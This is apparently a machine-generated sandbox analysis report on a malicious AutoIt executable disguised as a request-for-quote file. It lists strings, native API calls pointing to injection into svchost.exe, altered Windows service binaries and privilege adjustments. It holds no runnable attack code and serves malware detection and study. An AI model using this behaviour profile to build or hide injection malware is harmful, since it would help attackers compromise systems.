                Source: RFQ _ Virtue 054451000085.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c0281e06-7
                Source: initial sampleStatic PE information: Filename: RFQ _ Virtue 054451000085.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0042CBC3 NtClose,10_2_0042CBC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72B60 NtClose,LdrInitializeThunk,10_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A735C0 NtCreateMutant,LdrInitializeThunk,10_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A74340 NtSetContextThread,10_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A74650 NtSuspendThread,10_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72BA0 NtEnumerateValueKey,10_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72B80 NtQueryInformationFile,10_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72BE0 NtQueryValueKey,10_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72BF0 NtAllocateVirtualMemory,10_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72AB0 NtWaitForSingleObject,10_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72AF0 NtWriteFile,10_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72AD0 NtReadFile,10_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72FA0 NtQuerySection,10_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72FB0 NtResumeThread,10_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72F90 NtProtectVirtualMemory,10_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72FE0 NtCreateFile,10_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72F30 NtCreateSection,10_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72F60 NtCreateProcessEx,10_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72EA0 NtAdjustPrivilegesToken,10_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72E80 NtReadVirtualMemory,10_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72EE0 NtQueueApcThread,10_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72E30 NtWriteVirtualMemory,10_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72DB0 NtEnumerateKey,10_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72DD0 NtDelayExecution,10_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72D30 NtUnmapViewOfSection,10_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72D00 NtSetInformationFile,10_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72D10 NtMapViewOfSection,10_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72CA0 NtQueryInformationToken,10_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72CF0 NtOpenProcess,10_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72CC0 NtQueryVirtualMemory,10_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72C00 NtQueryInformationProcess,10_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A72C60 NtCreateKey,10_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A73090 NtSetValueKey,10_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A73010 NtOpenDirectoryObject,10_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A739B0 NtGetContextThread,10_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A73D10 NtOpenProcessToken,10_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A73D70 NtOpenThread,10_2_03A73D70
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
                Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\902dfe32f8c88b11.binJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0040E6A00_2_0040E6A0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0042D9750_2_0042D975
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0040FCE00_2_0040FCE0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004221C50_2_004221C5
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004362D20_2_004362D2
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004803DA0_2_004803DA
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0043242E0_2_0043242E
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004225FA0_2_004225FA
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0045E6160_2_0045E616
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004166E10_2_004166E1
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0043878F0_2_0043878F
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004368440_2_00436844
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004808570_2_00480857
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004188080_2_00418808
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004688890_2_00468889
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0042CB210_2_0042CB21
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00436DB60_2_00436DB6
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00416F9E0_2_00416F9E
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004130300_2_00413030
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0042F1D90_2_0042F1D9
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004231870_2_00423187
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004012870_2_00401287
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004214840_2_00421484
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004155200_2_00415520
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004276960_2_00427696
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004157600_2_00415760
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004219780_2_00421978
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00439AB50_2_00439AB5
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00529CC80_2_00529CC8
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00487DDB0_2_00487DDB
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00421D900_2_00421D90
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0042BDA60_2_0042BDA6
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0040DF000_2_0040DF00
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00413FE00_2_00413FE0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BB00D90_2_00BB00D9
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B76EAF0_2_00B76EAF
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B751EE0_2_00B751EE
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BB515C0_2_00BB515C
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BAD5800_2_00BAD580
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BA37800_2_00BA3780
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BAC7F00_2_00BAC7F0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BB39A30_2_00BB39A3
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BA59800_2_00BA5980
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B77B710_2_00B77B71
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B77F800_2_00B77F80
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00E819B00_2_00E819B0
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B8A8107_2_00B8A810
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B67C007_2_00B67C00
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B679F07_2_00B679F0
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B92D407_2_00B92D40
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B8EEB07_2_00B8EEB0
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B892A07_2_00B892A0
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B893B07_2_00B893B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00418BA310_2_00418BA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040E85510_2_0040E855
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004010C810_2_004010C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004010D010_2_004010D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0042F1D310_2_0042F1D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004029F810_2_004029F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00402A0010_2_00402A00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004032D010_2_004032D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0041040A10_2_0041040A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0041041310_2_00410413
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040150010_2_00401500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00416DA310_2_00416DA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040E64310_2_0040E643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0041063310_2_00410633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_004026F010_2_004026F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040E78810_2_0040E788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0040E79310_2_0040E793
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E3F010_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B003E610_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFA35210_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC02C010_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE027410_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B001AA10_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF81CC10_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3010010_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADA11810_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC815810_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD200010_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3C7C010_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4077010_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6475010_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5C6E010_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B0059110_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4053510_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AEE4F610_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF244610_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF6BD710_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFAB4010_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3EA8010_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A429A010_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B0A9A610_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5696210_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A268B810_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6E8F010_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4A84010_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4284010_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ABEFA010_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4CFE010_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A32FC810_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A82F2810_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A60F3010_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB4F4010_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A52E9010_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFCE9310_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFEEDB10_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFEE2610_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40E5910_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A58DBF10_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3ADE010_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4AD0010_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE0CB510_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A30CF210_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A40C0010_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A8739A10_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF132D10_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2D34C10_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A452A010_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AE12ED10_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5B2C010_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4B1B010_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A7516C10_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2F17210_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03B0B16B10_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF70E910_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFF0E010_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AEF0CC10_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A470C010_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFF7B010_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF16CC10_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADD5B010_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF757110_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFF43F10_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3146010_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5FB8010_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB5BF010_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A7DBF910_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFFB7610_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03ADDAAC10_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A85AA010_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AEDAC610_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB3A6C10_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFFA4910_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF7A4610_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD591010_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4995010_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5B95010_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A438E010_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AAD80010_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFFFB110_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A41F9210_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFFF0910_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A49EB010_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5FDC010_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF7D7310_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A43D4010_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AF1D5A10_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFFCF210_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB9C3210_2_03AB9C32
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD7C0011_2_00CD7C00
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CFA81011_2_00CFA810
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD79F011_2_00CD79F0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00D02D4011_2_00D02D40
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CF92A011_2_00CF92A0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CFEEB011_2_00CFEEB0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CF93B011_2_00CF93B0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: String function: 00407DE1 appears 35 times
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: String function: 00428900 appears 41 times
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: String function: 00420AE3 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 272 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 56 times
                Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
                Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1535764226.0000000004FE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ _ Virtue 054451000085.exe
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1535372793.000000000518D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ _ Virtue 054451000085.exe
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518974434.0000000004190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs RFQ _ Virtue 054451000085.exe
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495945542.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs RFQ _ Virtue 054451000085.exe
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1491215676.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs RFQ _ Virtue 054451000085.exe
                Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                Source: RFQ _ Virtue 054451000085.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: RFQ _ Virtue 054451000085.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: RFQ _ Virtue 054451000085.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
